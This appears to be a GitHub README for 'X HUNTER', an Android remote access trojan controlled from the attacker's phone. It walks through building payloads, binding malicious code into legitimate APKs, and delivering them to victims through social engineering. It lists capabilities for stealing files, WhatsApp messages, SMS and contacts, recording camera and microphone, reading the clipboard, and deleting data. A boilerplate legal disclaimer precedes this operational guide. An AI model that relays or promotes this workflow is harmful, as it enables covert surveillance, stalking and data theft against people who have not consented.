Android Phone HAcking app EAsy to use and Easy to Build
Usage of X HUNTER for attacking targets without prior mutual consent is illegal. It's the end user's responsibility to obey all applicable local, state, and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program. Use Responsibly!
About
There are many great Android RAT available on GitHub; however, I didn't find one that really suited my needs so I created this enhanced one. I want to create a RAT so amazing that it'll be the last one you ever need -- I think this is it.
Here's why:
- The main reason, I did start this project is to simplify the problem of the connection between attacker and victim.[Eliminated all port forwarding and over-the-internet issues]
- Followed by, I wanted to have control over victims using a smartphone
with a simple UI app rather than a pc or remote virtual machine with a command line interface.
Prerequisites
Before we proceed one must have:
- Android Device
- Good Internet Connection
Installation and Usage
In order to use the tool we must :
- Setup your hunter-server from here
- Download the latest version xhunter_vX.X.apk from the release section: here
- Once downloaded, Install/Open the app on your device. If you face an Unknown Source error see
- Once installed, Open the app and select the Build Payloads option, and select any desired option to build payload :
- Build WhatsApp Payload (
use this option/payload to enable whatsapp message feature
) - Build + Bind Payload (
use this option/payload to bind xhunter malicious code with legitimate apk
)
- Send the payload to the victim (
use social engineering or other method
)
- Once the victim uses the payload you will get an active session of the victim's device to your device
In order to connect/listen to your victim you must :
video.mp4
Select the Start Listening option to listen for the active connection
Once started listening you can select the active victim device from the device list and can access all the listed features below
Features
Real-time receive any file or folder from the target device bind with other apps fetch all Whatsapp messages fetch all Whatsapp contacts receive all target message send an SMS with the target device to any number receive all target contacts receive a list of all installed apps in the target device delete any file or folder from the target device capture main and front camera capture microphone receive last clipboard text
Contributing
Contributions are what make the open-source community such an amazing place to learn, inspire, and create. Any contributions you make are greatly appreciated.
If you have a suggestion that would make this better, please fork the repo and create a pull request. You can also simply open an issue with the tag "enhancement". Don't forget to give the project a star! Thanks again!
- Fork the Project
- Create your Feature Branch (
git checkout -b feature/AmazingFeature
) - Commit your Changes (
git commit -m 'Add some AmazingFeature'
) - Push to the Branch (
git push origin feature/AmazingFeature
) - Open a Pull Request